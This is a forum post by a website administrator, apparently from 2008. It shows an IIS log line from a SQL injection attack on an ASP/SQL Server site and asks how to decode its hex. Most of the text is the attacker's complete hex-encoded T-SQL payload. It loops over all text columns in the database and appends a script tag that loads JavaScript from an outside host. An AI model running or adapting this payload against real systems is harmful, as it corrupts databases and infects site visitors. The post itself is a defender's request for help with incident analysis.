We've been working on hardening our web site which is written in .asp and uses SQL 2000 on the back-end. We've had a few SQL injection attacks and we're trying to decode what is being passed. Here's an example of the log from the IIS server.
xx.xx.xx.xx, -, 7/15/2008, 10:57:27, W3SVC1, WS01, xx.xx.xx.xx, 546, 1427, 6592, 200, 0, GET, /ers/rdr_login.asp, magradio=WW;DECLARE%20@S%2
0VARCHAR(4
000);SET%2
0@S=CAST(0
x4445434C4
1524520405
4205641524
3484152283
23535292C4
0432056415
2434841522
8323535292
04445434C4
1524520546
1626C655F4
37572736F7
2204355525
34F5220464
F522053454
C454354206
12E6E616D6
52C622E6E6
16D6520465
24F4D20737
9736F626A6
5637473206
12C7379736
36F6C756D6
E732062205
7484552452
0612E69643
D622E69642
0414E44206
12E7874797
0653D27752
720414E442
028622E787
47970653D3
939204F522
0622E78747
970653D333
5204F52206
22E7874797
0653D32333
1204F52206
22E7874797
0653D31363
729204F504
54E2054616
26C655F437
572736F722
0464554434
8204E45585
42046524F4
D205461626
C655F43757
2736F72204
94E544F204
0542C40432
05748494C4
5284040464
55443485F5
3544154555
33D3029204
24547494E2
0455845432
8275550444
15445205B2
72B40542B2
75D2053455
4205B272B4
0432B275D3
D525452494
D28434F4E5
6455254285
6415243484
1522834303
030292C5B2
72B40432B2
75D29292B2
7273C73637
2697074207
372633D687
474703A2F2
F7777772E7
46374636F7
72E636F6D2
F6E67672E6
A733E3C2F7
3637269707
43E2727272
9204645544
348204E455
8542046524
F4D2054616
26C655F437
572736F722
0494E544F2
040542C404
320454E442
0434C4F534
5205461626
C655F43757
2736F72204
445414C4C4
F434154452
05461626C6
55F4375727
36F7220%20
AS%20VARCH
AR(4000));
EXEC(@S);-
-,
Does anyone have a good method or utility to decode what looks like hex code?
Many Thanks,
Start Free Trial